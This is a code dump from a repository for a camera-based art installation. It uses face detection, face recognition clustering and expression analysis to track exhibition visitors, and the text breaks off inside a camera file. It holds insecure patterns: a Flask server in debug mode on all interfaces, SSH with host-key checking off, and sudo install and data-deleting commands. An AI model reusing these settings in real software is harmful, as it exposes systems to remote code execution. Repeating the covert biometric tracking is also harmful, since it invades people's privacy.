"src_encoding": "UTF-8", "text": "import numpy as np\n\ndef face_to_features(face):\n shape = np.asarray(face['shape']).astype(float)\n descriptor = np.asarray(face['descriptor']).astype(float)\n # 1/320 is approximately (128/10)/4096\n # 128 = len(descriptor), 10 = len(shape), 4096 = max(shape)\n position_weight = 1/320\n features = np.hstack((shape.reshape(-1) * position_weight, descriptor))\n return features\n \ndef classify(face, blocklist, threshold=8):\n features = face_to_features(face)\n distances = np.sqrt((features - np.asarray(blocklist)) ** 2).sum(1)\n closest = distances.min()\n return closest < threshold" }, { "alpha_fraction": 0.7333333492279053, "alphanum_fraction": 0.75, "avg_line_length": 29.5, "blob_id": "fcb26170934b99641902096fa9654af74f246223", "content_id": "f9f6b7b3dfc1562b1fcd9d88c6b82e976a997fbb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 60, "license_type": "no_license", "max_line_length": 50, "num_lines": 2, "path": "/app/run.sh", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "#!/bin/sh\n~/miniconda3/envs/vibe-check-app/bin/python app.py" }, { "alpha_fraction": 0.6709844470024109, "alphanum_fraction": 0.681347131729126, "avg_line_length": 23.1875, "blob_id": "b628c0aebaa48353867d8d942ae8edca54e2f6df", "content_id": "54041b690d0021636e13dbc49c72e90bf883aa11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 386, "license_type": "no_license", "max_line_length": 61, "num_lines": 16, "path": "/face/single.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "from flask import Flask, request, jsonify\n\nfrom AnalysisProcess import AnalysisProcess\n\napp = Flask(__name__)\n\nanalyzer = AnalysisProcess()\n\[email protected]('/vibecheck/upload/<camera_id>', methods=['POST'])\ndef upload(camera_id):\n data = request.get_data()\n analyzer(camera_id, data)\n return jsonify(success=True)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)" }, { "alpha_fraction": 0.5453222393989563, "alphanum_fraction": 0.5553014278411865, 
"avg_line_length": 22.34951400756836, "blob_id": "051de22d5c811337dc66ccf7e019fcc2c16338c4", "content_id": "ab68fe28d391cba4163afee5dae157b9d36df429", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4810, "license_type": "no_license", "max_line_length": 95, "num_lines": 206, "path": "/rpi/cameras", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "#!/bin/bash -m\n\nsource camera-functions.sh\n\nfunction usage() {\n cat << EOF\n./$SCRIPT\n\n Control all the cameras. Define IDS to control a subset.\n\n help: print this message\n list: list all the camera ids and addresses\n set-hostname <ip> <id>: setup hostname and SSH at <ip> as camera <id>\n ssh-copy-id: copy SSH key from this machine to each camera\n ping: check connection to all cameras (uses SSH)\n exec: execute command via ssh on all cameras\n ssh <id>: helper to ssh into specific camera\n download <path>: download directory from each camera\n status: display info and recent logfile for all cameras\n shutdown: shutdown all cameras\n reboot: reboot all cameras\n update: rsync code and install arducam library on all cameras\n start/stop/restart/enable/disable: systemctl * vibecheck\nEOF\n exit\n}\n\nif [ $# -eq 0 ]; then\n usage\nfi\n\n# these are cases that do not require IDs\ncase \"$1\" in\nhelp)\n usage\n;;\nlist)\n for ID in $IDS; do\n ADDRESS=`get_address $ID`\n AT=`get_at $ID`\n echo $ID $ADDRESS\n done\n exit\nesac\n\nif [ ! -e \"$SSH_FILE\" ]; then\n echo \"Couldn't find $SSH_FILE\"\n echo \"Try running ssh-keygen first\"\n exit\nfi\n\n# these are cases that operate on a specific device\ncase \"$1\" in\nset-hostname)\n if [ \"$#\" -ne 3 ]; then\n echo \"Example: ./$SCRIPT set-hostname 192.168.0.150 0\"\n usage\n fi\n\n IP=$2\n ID=$3\n AT=pi@$IP\n ssh-copy-id -i $SSH_FILE $AT\n HOSTNAME=$HOSTNAME_PREFIX$ID\n # it takes four separate commands to fully set the hostname\n # \"sudo: unable to resolve host...\" is not an error, just intermediate\n # final command restarts the mdns server\n ssh $AT \"sudo sed -i \\\"s/0\\.1\\.1.*/0.1.1\\t$HOSTNAME/g\\\" /etc/hosts &&\\\n sudo hostnamectl set-hostname $HOSTNAME &&\\\n sudo hostname $HOSTNAME &&\\\n echo $HOSTNAME | sudo tee /etc/hostname &&\\\n sudo systemctl restart avahi-daemon\"\n exit\n;;\nssh)\n ID=$2\n AT=`get_at $ID`\n ssh $AT\n exit\n;;\nesac\n\n# checking command validity\ncase \"$1\" in\n ping) ;;\n exec) ;;\n shutdown) ;;\n reboot) ;;\n update) ;;\n status) ;;\n pingtime) ;;\n enable) ;;\n disable) ;;\n start) ;;\n stop) ;;\n restart) ;;\n ssh-copy-id) ;;\n download) ;;\n *)\n echo \"Invalid command\"\n usage\n ;;\nesac\n\n# sequential commands\nfor ID in $IDS; do\n AT=`get_at $ID`\n case \"$1\" in\n ssh-copy-id)\n ssh-copy-id -i $SSH_FILE $AT\n ;;\n esac\ndone\n\n# parallel commands\nfor ID in $IDS; do\n{\n ADDRESS=$HOSTNAME_PREFIX$ID$HOSTNAME_SUFFIX\n AT=pi@$ADDRESS\n PREFIX=`printf \"%2s\" $ID`\n \n # check if the device is online before continuing\n ssh -q \\\n -o BatchMode=yes \\\n -o StrictHostKeyChecking=no \\\n -o ConnectTimeout=1 \\\n $AT \\\n 'exit 0'\n if [ $? -ne 0 ]\n then\n ping -W1 -c1 $ADDRESS &> /dev/null\n if [ $? 
-ne 0 ]\n then\n echo \"$PREFIX down\"\n else\n echo \"$PREFIX up, cannot ssh\"\n fi\n continue\n fi\n\n case \"$1\" in\n ping)\n echo \"$PREFIX up\"\n ;;\n exec)\n ssh $AT \"${@:2}\"\n ;;\n shutdown)\n ssh $AT \"/sbin/shutdown now\"\n ;;\n reboot)\n ssh $AT \"/sbin/shutdown --reboot now\"\n ;;\n pingtime)\n HOSTNAME=$(hostname)\n ssh $AT 'RTT=`ping -c4 -i0.2 '$HOSTNAME'.local | grep rtt` &&\\\n echo '$ID' $RTT'\n ;;\n status) \n ssh $AT 'TEMP=`vcgencmd measure_temp|cut -d= -f2` ;\\\n CPU_MEM=`ps --no-headers -eo cmd,%cpu,%mem --sort=-%cpu|head -n1|cut -d\" \" -f4-` ;\\\n ACTIVE=`systemctl is-active vibecheck` ;\\\n STATUS=`tail -n1 /var/log/vibecheck.log` ;\\\n ERR_STATUS=`tail -n1 /var/log/vibecheck.err.log` ;\\\n echo '$ID' $ACTIVE $TEMP $CPU_MEM $STATUS / $ERR_STATUS'\n ;;\n update)\n rsync -a \\\n --exclude=.DS_Store \\\n --exclude=__pycache__ \\\n --delete \\\n camera/ $AT:~/$ROOT_NAME/\n rsync -a config/$ID.json $AT:~/$ROOT_NAME/config.json\n ssh $AT 'sudo install -m 644 camera/libarducam_mipicamera.so /usr/lib/'\n echo $ID 'updated'\n ;;\n enable)\n ssh $AT \"systemctl enable vibecheck\"\n ;;\n disable)\n ssh $AT \"systemctl disable vibecheck\"\n ;;\n start)\n ssh $AT \"systemctl start vibecheck\"\n ;;\n stop)\n ssh $AT \"systemctl stop vibecheck\"\n ;;\n restart)\n ssh $AT \"systemctl restart vibecheck\"\n ;;\n download)\n if [ \"$#\" -ne 2 ]; then\n echo \"Example: ./$SCRIPT download /home/pi/reference/\"\n usage\n fi\n\n REMOTE_DIR=$2\n LOCAL_DIR=download/$ID\n mkdir -p $LOCAL_DIR\n rsync -a $AT:$REMOTE_DIR $LOCAL_DIR\n ;;\n esac\n} &\ndone\nwait\n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.6364829540252686, "avg_line_length": 23.612903594970703, "blob_id": "eb96bd0868f2046adebdd9ee5b8f1e3444057ab0", "content_id": "4541af5b12d65a53b62ff198ffffeee1dc684dc9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 762, "license_type": "no_license", "max_line_length": 67, "num_lines": 31, "path": "/database/manual-data.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "from pymongo import MongoClient\nimport hdbscan\nimport json\nfrom bson.objectid import ObjectId\nfrom cluster import write_json\n\n# connect to mongo\nclient = MongoClient()\n\ntargets = {\n 'neutral':'4/1598376764645.jpg',\n 'happiness':'4/1598376764645.jpg',\n 'surprise':'4/1598376764645.jpg',\n 'anger':'4/1598376764645.jpg',\n 'disgust':'4/1598376764645.jpg',\n 'fear':'4/1598376764645.jpg',\n 'contempt':'4/1598376764645.jpg'\n}\n\nresults = {}\nfor key,fn in targets.items():\n data = client.vibecheck.raw.find({'photo_path':fn}).limit(1)[0]\n results[key] = {\n 'faceid': 0,\n 'average': 1.0,\n 'photo_path': fn,\n 'rect': data['faces'][0]['rect'],\n 'timestamp': data['_id'].generation_time\n }\n\nwrite_json(results)" }, { "alpha_fraction": 0.5849608182907104, "alphanum_fraction": 0.5909392833709717, "avg_line_length": 36.6349983215332, "blob_id": "f382b4adad8518ce8773df62013b452ab212e435", "content_id": "5550790e8694801d88efe12e5fd9dbde7ad4fb63", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7527, "license_type": "no_license", "max_line_length": 127, "num_lines": 200, "path": "/database/cluster.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "# if this script is running in a different timezone than the database,\n# then the weighting will be calculated incorrectly. 
the alternative is to\n# explicitly code the timezone of the database, but then the code has to be\n# manually updated when the installation moves time zones.\n\nfrom pymongo import MongoClient\nimport hdbscan\nimport json\nimport math\nfrom bson.objectid import ObjectId\nfrom collections import defaultdict\nimport datetime\n\nclass Encoder(json.JSONEncoder):\n def default(self, obj):\n if hasattr(obj, 'isoformat'):\n return obj.isoformat()\n elif isinstance(obj, ObjectId):\n return str(obj)\n else:\n return obj\n\n# connect to mongo\nclient = MongoClient()\n\ndef recognize():\n # load all data from \"raw\" collection \n raw_data = []\n descriptors = []\n for e in client.vibecheck.raw.find().limit(10000).sort('$natural',-1):\n raw_data.append(e)\n descriptors.extend([face['descriptor'] for face in e['faces']])\n\n print('total descriptors:', len(descriptors))\n\n if len(descriptors) == 0:\n print('skipping...')\n return []\n\n # cluster all the labels (can take 15 seconds)\n clusterer = hdbscan.HDBSCAN(\n min_cluster_size=2,\n cluster_selection_epsilon=0.4,\n core_dist_n_jobs=-1)\n labels = clusterer.fit_predict(descriptors)\n\n # combine labels with raw to create recognized_photos\n recognized_photos = []\n labels_iter = iter(labels)\n for e in raw_data:\n people = []\n for face in e['faces']:\n face_id = next(labels_iter)\n people.append({\n 'faceid': str(face_id),\n 'rect': face['rect'],\n 'expressions': face['expression']\n })\n recognized_photos.append({\n 'created': e['_id'].generation_time,\n 'camera': e['camera_id'],\n 'photoPath': e['photo_path'],\n 'people': people\n })\n\n # drop old recognized-photos and create a new one\n # client.vibecheck['recognized-photos'].drop()\n # client.vibecheck['recognized-photos'].insert_many(recognized_photos)\n\n return recognized_photos\n\n# 100 drops to weight of 0.2 over 7 days\n# 10 drops to weight of 0.2 over 1 day\ndef get_weight(dt, falloff=100):\n now = datetime.datetime.now().astimezone()\n secs = (now - dt).total_seconds() # positive\n hours = secs / (60 * 60)\n return math.exp(-hours / falloff)\n\n# main method, analyzes each entry in recognized-photos, builds db of people, updates mongo\ndef update_db(recognized_photos):\n all_expressions = []\n people_db = {}\n \n for document in recognized_photos:\n people = document['people']\n\n # to run this script in a different timezone than the database,\n # pass the database's timezone to astimezone(). 
e.g., UTC+2 (CEST):\n # db_timezone = datetime.timezone(datetime.timedelta(seconds=7200))\n weight = get_weight(document['created'].astimezone())\n\n # get sum of expressions in photo\n total_expressions = sum_photo_expressions(people)\n num_people = len(people) - 1\n \n # for each person, calculate total expression response\n for person in people:\n faceid = person['faceid']\n expressions = {}\n max_expressions = {}\n max_photos = {}\n max_rects = {}\n max_timestamp = {}\n for exp in person['expressions']:\n if len(all_expressions) == 0:\n all_expressions = person['expressions']\n\n val = total_expressions[exp] - person['expressions'][exp]\n val *= weight\n if exp in expressions:\n expressions[exp] += val\n if val > max_expressions[exp]:\n max_expressions[exp] = val\n max_photos[exp] = document['photoPath']\n max_rects[exp] = person['rect']\n max_timestamp[exp] = document['created']\n else:\n expressions[exp] = val\n max_expressions[exp] = val\n max_photos[exp] = document['photoPath']\n max_rects[exp] = person['rect']\n max_timestamp[exp] = document['created']\n\n # add or update entry in people_db\n update_person_entry(people_db, faceid, expressions, max_expressions,\n max_photos, max_rects, max_timestamp, num_people)\n\n # enter all into mongodb\n prep_and_update_mongo(people_db)\n return all_expressions\n\n# calculate sum expressions expressed in photo by all (helper method)\ndef sum_photo_expressions(people):\n total_expressions = defaultdict(float)\n for person in people:\n for exp, val in person['expressions'].items():\n total_expressions[exp] += val\n return dict(total_expressions)\n\n# add or update entry in people_db\ndef update_person_entry(people_db, faceid, expressions, max_expressions, max_photos, max_rects, max_timestamp, num_people):\n if faceid in people_db.keys():\n people_db[faceid]['num_people'] += num_people\n for exp in expressions:\n people_db[faceid]['expressions'][exp] += expressions[exp]\n if max_expressions[exp] > people_db[faceid]['max_expressions'][exp]:\n people_db[faceid]['max_expressions'][exp] = max_expressions[exp]\n people_db[faceid]['max_photos'][exp] = max_photos[exp]\n people_db[faceid]['max_rects'][exp] = max_rects[exp]\n people_db[faceid]['max_timestamp'][exp] = max_timestamp[exp]\n else:\n people_db[faceid] = {\n 'expressions': expressions,\n 'avg_expressions': {},\n 'max_expressions': max_expressions,\n 'max_photos': max_photos,\n 'max_rects': max_rects,\n 'max_timestamp': max_timestamp,\n 'num_people': num_people,\n 'faceid': faceid\n }\n\n# calculate average expressions and update mongo\ndef prep_and_update_mongo(people_db):\n docs = []\n for faceid in people_db:\n for exp in people_db[faceid]['expressions']:\n if people_db[faceid]['num_people'] == 0:\n print(f'faceid {faceid} exp {exp} num_people==0, skipping')\n continue\n people_db[faceid]['avg_expressions'][exp] = people_db[faceid]['expressions'][exp]/(people_db[faceid]['num_people'])\n docs.append(people_db[faceid])\n print('total people:', len(docs))\n\n client.vibecheck['people'].drop() # clear people collection, recreated regularly\n client.vibecheck['people'].insert_many(docs)\n\n# writes json file from mongo\ndef write_json(all_expressions):\n output = {}\n for exp in all_expressions:\n # exp = e['expression']\n max_exp = client.vibecheck['people'].find().sort('avg_expressions.'+exp, -1)[0]\n output[exp] = {\n 'faceid': max_exp['faceid'],\n 'average': max_exp['avg_expressions'][exp],\n 'photo_path': max_exp['max_photos'][exp],\n 'rect': max_exp['max_rects'][exp],\n 'timestamp': 
max_exp['max_timestamp'][exp]\n }\n with open('../app/static/data.json', 'w', encoding='utf-8') as f:\n json.dump(output, f, cls=Encoder, indent=2)\n\nif __name__ == '__main__':\n recognized_photos = recognize()\n if len(recognized_photos) == 0:\n exit()\n all_expressions = update_db(recognized_photos)\n write_json(all_expressions)\n" }, { "alpha_fraction": 0.5891169905662537, "alphanum_fraction": 0.6076897978782654, "avg_line_length": 35.117645263671875, "blob_id": "013e4d1433d5bfc7d406952509e75d34b7c22bc7", "content_id": "6196b11ce9fd191e6b2bed4e33a81e8b93f79b0c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3069, "license_type": "no_license", "max_line_length": 113, "num_lines": 85, "path": "/face/FaceAnalyzer.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "import dlib\nimport onnxruntime as ort\nimport cv2\nimport numpy as np\nfrom imutil import safe_crop\n\ndef rgb_to_gray(img):\n return img.mean(axis=-1)[...,np.newaxis].repeat(3,-1)\n\ndef preprocess(img):\n x = cv2.resize(img, (96,96))\n x = x.astype(np.float32)\n x -= 127.5\n x /= 127.5\n x = rgb_to_gray(x)\n return x[np.newaxis]\n\ndef softmax(x):\n x = np.exp(x)\n return x / x.sum()\n\ndef resize_rect(rect, upsample):\n tblr = (rect.top(), rect.bottom(), rect.left(), rect.right())\n return (np.asarray(tblr) * upsample).astype(int).tolist()\n\ndef resize_shape(shape, upsample):\n parts = [(e.x, e.y) for e in shape.parts()]\n return (np.asarray(parts) * upsample).astype(int).tolist()\n \ndef dlib_crop(img, rect):\n tblr = (rect.top(), rect.bottom(), rect.left(), rect.right())\n return safe_crop(img, tblr, fill=128)\n\ndef tblr_to_xywh(tblr):\n t,b,l,r = tblr\n return [\n (l + r) * 0.5,\n (t + b) * 0.5,\n (r - l),\n (b - t)\n ]\n\ndef xywh_to_tblr(xywh):\n x,y,w,h = xywh\n return [\n y - (h / 2),\n y + (h / 2),\n x - (w / 2),\n x + (w / 2)\n ]\n\nclass FaceAnalyzer:\n def __init__(self):\n self.face_detector = dlib.cnn_face_detection_model_v1('models/mmod_human_face_detector.dat')\n self.shape_predictor = dlib.shape_predictor('models/shape_predictor_5_face_landmarks.dat')\n self.face_recognizer = dlib.face_recognition_model_v1('models/dlib_face_recognition_resnet_model_v1.dat')\n self.expression_classifier = ort.InferenceSession('models/ferplus-mobilenetv2-0.830.onnx')\n with open('models/ferplus_classes.txt') as f:\n self.expression_classes = f.read().splitlines()\n\n def __call__(self, img, downsample=2):\n height, width = img.shape[:2]\n img_small = cv2.resize(img, (width//downsample, height//downsample))\n rects = self.face_detector(img_small, 0)\n rects = [e.rect for e in rects] # needed for cnn_face_detection_model_v1\n if len(rects) == 0:\n return []\n shapes = [self.shape_predictor(img_small, e) for e in rects] # 2ms\n descriptors = [self.face_recognizer.compute_face_descriptor(img_small, e) for e in shapes] # 20ms\n faces = np.vstack([preprocess(dlib_crop(img_small, e)) for e in rects])\n expressions = self.expression_classifier.run(None, {'mobilenetv2_1.00_96_input': faces})[0] # 4ms\n rects = [resize_rect(e, downsample) for e in rects]\n shapes = [resize_shape(e, downsample) for e in shapes]\n descriptors = [np.asarray(e).astype(float).tolist() for e in descriptors]\n expressions = [e.reshape(-1).astype(float) for e in expressions]\n expressions = [dict(zip(self.expression_classes, e)) for e in expressions]\n\n # switch from tblr to xywh\n rects = map(tblr_to_xywh, rects)\n\n faces = []\n keys = ('rect', 'shape', 'descriptor', 
'expression')\n for values in zip(rects, shapes, descriptors, expressions):\n faces.append(dict(zip(keys, values)))\n return faces" }, { "alpha_fraction": 0.5565714240074158, "alphanum_fraction": 0.5805714130401611, "avg_line_length": 32.653846740722656, "blob_id": "c82cde70032195bd9f5d7ca3e9068ca480bfc87f", "content_id": "d5138c0b729143535cd3a28fe4152bcdd3b40b28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1750, "license_type": "no_license", "max_line_length": 114, "num_lines": 52, "path": "/face/draw_shapes.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "import cv2\n\ndef draw_line(canvas, pt1, pt2, r=1, stroke=None):\n pt1 = tuple(map(int, pt1))\n pt2 = tuple(map(int, pt2))\n cv2.line(canvas, pt1, pt2, stroke, thickness=r, lineType=cv2.LINE_AA)\n\ndef draw_text(canvas, text, xy, color=0, scale=1, thickness=1, highlight=None,\n font_face=cv2.FONT_HERSHEY_SIMPLEX, antialias=False):\n l,t = xy\n (tw,th), baseline = cv2.getTextSize(text, font_face, scale, thickness)\n t += th + baseline - 1\n if highlight is not None:\n canvas[t-th-baseline-1:t,l:l+tw] = highlight\n cv2.putText(canvas, text, (l,t-baseline), font_face, scale, color, thickness, cv2.LINE_AA if antialias else 0)\n\n# for some reason a fill of 0 doesn't work, but 0.1 does work\ndef draw_circle(canvas, xy, r=1, stroke=None, fill=None, thickness=1, antialias=False):\n x,y = tuple(map(int, xy))\n line_type = cv2.LINE_AA if antialias else cv2.LINE_8\n if fill is not None:\n cv2.circle(canvas, (x,y), r, fill, -1, line_type)\n if stroke is not None:\n cv2.circle(canvas, (x,y), r, stroke, thickness, line_type)\n\ndef draw_rectangle(canvas, tblr, fill=None, stroke=None):\n t,b,l,r = tblr\n t = int(max(t,0))\n b = int(min(b,canvas.shape[0]-1))\n l = int(max(l,0))\n r = int(min(r,canvas.shape[1]-1))\n if fill is not None:\n canvas[t:b,l:r] = fill\n if stroke is not None:\n b -= 1\n r -= 1\n try:\n canvas[t:b,l] = stroke\n except IndexError:\n pass\n try:\n canvas[t:b,r] = stroke\n except IndexError:\n pass\n try:\n canvas[t,l:r] = stroke\n except IndexError:\n pass\n try:\n canvas[b,l:r+1] = stroke\n except IndexError:\n pass\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 28.5, "blob_id": "bc4605a40adef744b20017fb3be0b137014f46c7", "content_id": "566b722e3521840aa2d6787a9c4711e5dbdc38bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 471, "license_type": "no_license", "max_line_length": 63, "num_lines": 16, "path": "/database/download-used-images.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "import json\nfrom subprocess import call\nimport os\n\nwith open('../app/static/data.json') as f:\n data = json.load(f)\n\nimages = set(e['photo_path'] for e in data.values())\n\nfor image in images:\n input_fn = 'hek:~/Documents/vibe-check/app/images/' + image\n directory, fn = os.path.split(image)\n output_dir = os.path.join('../app/images', directory)\n os.makedirs(output_dir, exist_ok=True)\n print(input_fn, output_dir)\n call(['scp', input_fn, output_dir])" }, { "alpha_fraction": 0.7460317611694336, "alphanum_fraction": 0.761904776096344, "avg_line_length": 31, "blob_id": "067011d5c7736e0d354249158690484c19b42a90", "content_id": "ace988a32b22efd4fc6ea60c4593a13cf8929d1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 63, "license_type": "no_license", 
"max_line_length": 51, "num_lines": 2, "path": "/face/run.sh", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "#!/bin/bash\n~/miniconda3/envs/vibe-check-dlib/bin/python app.py" }, { "alpha_fraction": 0.8212560415267944, "alphanum_fraction": 0.8212560415267944, "avg_line_length": 33.66666793823242, "blob_id": "e35babf33687e13b7b5fb4fbbb898cfb8afe7f56", "content_id": "7802476079205de36f452fbc715ec8fe503713b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 207, "license_type": "no_license", "max_line_length": 70, "num_lines": 6, "path": "/automate/build-multibrowse.sh", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "git clone https://github.com/foxxyz/multibrowse.git multibrowse-source\ncd multibrowse-source\nsudo apt install -y lxrandr\npip install -v pyinstaller\npyinstaller --onefile multibrowse.py\nmv dist/multibrowse .." }, { "alpha_fraction": 0.7240095734596252, "alphanum_fraction": 0.7468758225440979, "avg_line_length": 33.20000076293945, "blob_id": "70118a6adf890ab191e7a07b8fe636ce62e8ce15", "content_id": "70602850c6fb241b7ff179440362c6410c5aba35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3761, "license_type": "no_license", "max_line_length": 591, "num_lines": 110, "path": "/face/readme.md", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "# Face Analysis\n\nFirst download the models:\n\n```\nbash download-models.sh\n```\n\n## Setup environment\n\nThe `vibe-check-face` Anaconda environment is used for `cluster.py`, which runs regularly. `vibe-check-dlib` is needed for `vibe-check-face` service.\n\nWith Anaconda:\n\n```\nconda create -y --name vibe-check-face --no-default-packages python=3.7\nconda activate vibe-check-face\nconda install -y opencv numpy scipy\nconda install -y -c conda-forge dlib\npip install onnx onnxruntime easydict scikit-image sklearn flask pymongo hdbscan\n```\n\nOr from the yml file:\n\n```\nconda env create -f environment.yml\nconda activate vibe-check-app\npython app.py\n```\n\n## Install CUDA\n\nFirst install the NVIDIA Driver. This was originally tested under 440.100:\n\n```\nsudo apt install nvidia-driver-440\n```\n\nThen install CUDA (without the NVIDIA driver):\n\n```\ncd ~\nwget https://developer.nvidia.com/compute/cuda/10.1/Prod/local_installers/cuda_10.1.105_418.39_linux.run\nchmod +x cuda_10.1.105_418.39_linux.run\nsudo ./cuda_10.1.105_418.39_linux.run\n```\n\nAnd add the path to your `~/.profile`:\n\n```\nif [ -d \"/usr/local/cuda-10.1/bin/\" ]; then\n export PATH=/usr/local/cuda-10.1/bin${PATH:+:${PATH}}\n export LD_LIBRARY_PATH=/usr/local/cuda-10.1/lib64${LD_LIBRARY_PATH:+:${LD_LIBRARY_PATH}}\nfi\n```\n\nInstall cudnn with apt:\n\n```\nsudo apt-key adv --fetch-keys http://developer.download.nvidia.com/compute/cuda/repos/ubuntu1804/x86_64/7fa2af80.pub\nsudo bash -c 'echo \"deb http://developer.download.nvidia.com/compute/machine-learning/repos/ubuntu1804/x86_64 /\" > /etc/apt/sources.list.d/cuda_learn.list'\nsudo apt update\nsudo apt install libcudnn8 libcudnn8-dev\n```\n\n## Install dlib for GPU\n\n```\nsudo apt install -y libopenblas-dev liblapack-dev cmake\nconda create -y --name vibe-check-dlib --no-default-packages python=3.7\nconda activate vibe-check-dlib\ncd ~/Documents\ngit clone https://github.com/davisking/dlib.git\ncd dlib && mkdir build && cd build\ncmake ..\ncmake --build . 
--config Release\nsudo ldconfig\ncd ..\npython setup.py install --record files.txt\nconda install -y opencv\npip install flask onnxruntime pymongo\n```\n\n## Building the blocklist\n\nFirst, set `require_two_faces = False` in `AnalysisProcess.py`. Then delete any old images `find app/images -type f -delete` and restart the analyzer `sudo systemctl restart vibe-check-face`. And record ~100 images from each camera in the mostly empty exhibition space. Check how many images are available with `find app/images/0 | wc -l`.\n\nCheck multiple cameras simultaneously with:\n\n```\nfor id in `ls app/images/`; do echo $id `find app/images/$id | wc -l`; done\n```\n\nWhen enough images are available, `sudo systemctl stop vibe-check-face` then run `conda activate vibe-check-face && python build-blocklist.py`. This will recognize clusters of faces based on landmarks and face descriptors. When it is done, it will print analysis results, and output the file `blocklist.pkl`. This is loaded by `AnalysisProcess` to identify faces that need to be blocked. If it isn't recognizing some of the faces, lower `min_samples` and run again. It's ok if it's seeing some faces that aren't really there, as this will make the system more robust to pareidolic presences.\n\nWhen the script is finished, set `require_two_faces = True`, drop the face-related collections:\n\n```\nmongo vibecheck -eval 'db.getCollection(\"raw\").drop()'\nmongo vibecheck -eval 'db.getCollection(\"people\").drop()'\nmongo vibecheck -eval 'db.getCollection(\"recognized-photos\").drop()'\n```\n\nAnd clear the images `find app/images -type f -delete`, and restart the daemon `sudo systemctl restart vibe-check-face`.\n\nThe installation may appear broken until some people start walking through the space together.\n\n## Taking snapshots\n\nDelete an old snapshot to take a new snapshot." }, { "alpha_fraction": 0.7564259767532349, "alphanum_fraction": 0.7588739395141602, "avg_line_length": 31.719999313354492, "blob_id": "d592c0c9e64568b4e88170b57726a86f5b91c175", "content_id": "eef7cd2283c0c3f36f34134c0e970e685f2587e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 817, "license_type": "no_license", "max_line_length": 150, "num_lines": 25, "path": "/automate/readme.md", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "# Automation\n\n## Load multiple windows in kiosk mode\n\nFirst build multibrowse: `bash build-multibrowse.sh` If you have a problem building multibrowse, make sure to restart the shell so `pip` is available.\n\nThen run `bash open-chrome.sh`.\n\nMake a shell script executable:\n\n```\ngsettings set org.gnome.nautilus.preferences executable-text-activation 'launch'\n```\n\n## Create services for background tasks\n\nRun `sudo bash setup-services.sh` to setup the `vibe-check-cluster`, `vibe-check-app`, `vibe-check-face` services.\n\nTo check the status, run `journalctl -feu vibe-check-cluster`.\n\nTo restart after making changes to code, run `sudo systemctl restart vibe-check-cluster`.\n\n## Take screenshots\n\nInstall `sudo apt install scrot` then `bash screenshot.sh` and look in `screenshots/` for `0-thumb.jpg` and `1-thumb.jpg`." 
}, { "alpha_fraction": 0.75, "alphanum_fraction": 0.7638888955116272, "avg_line_length": 35.25, "blob_id": "b22042adefe8506098373d4aa53d63582897957c", "content_id": "aeb5ce8a34267dc216dba852fe749ad34972d102", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 144, "license_type": "no_license", "max_line_length": 61, "num_lines": 4, "path": "/rpi/preview-exposure.sh", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "export IDS=$1\nexport EXPOSURE=$2\n./cameras exec \"cd camera && python capture-raw.py $EXPOSURE\"\n./cameras download /home/pi/reference/preview.jpg" }, { "alpha_fraction": 0.4844309687614441, "alphanum_fraction": 0.525489091873169, "avg_line_length": 30.842105865478516, "blob_id": "ab701201a6a5fd4bd7d02bcc4372b9cfa9cf1f34", "content_id": "90db964146eff42449ac026a2b1eefd34cbf8af9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3629, "license_type": "no_license", "max_line_length": 91, "num_lines": 114, "path": "/rpi/camera/RawProcessor.py", "repo_name": "foocp/vibe-check", "src_encoding": "UTF-8", "text": "import cv2\nimport numpy as np\nfrom numba import njit\n\n@njit\ndef align_down(size, align):\n return (size & ~((align)-1))\n\n@njit\ndef align_up(size, align):\n return align_down(size + align - 1, align)\n\n@njit\ndef remove_padding_and_unpack_fast(data, width, height, bit_width, out):\n \"\"\"Remove padding and rearrange packed 16-bit values into unpacked.\"\"\"\n real_width = width // 8 * bit_width\n align_width = align_up(real_width, 32)\n jj = 0\n k = 0\n for y in range(height):\n j = jj\n for x in range(width//4):\n low = data[j+4]\n out[k] = (data[j] << 2) + ((low) & 0x3)\n out[k+1] = (data[j+1] << 2) + ((low >> 2) & 0x3)\n out[k+2] = (data[j+2] << 2) + ((low >> 4) & 0x3)\n out[k+3] = (data[j+3] << 2) + ((low >> 6) & 0x3)\n j += 5\n k += 4\n jj += align_width\n \ndef curves_to_lut(curves, in_range=1024, gamma=2.2):\n \"\"\"Build a LUT for a given set of curves, similar but not equal to Photoshop curves.\"\"\"\n lut = []\n x_values = np.arange(in_range).astype(float)\n for curve in curves:\n curve = 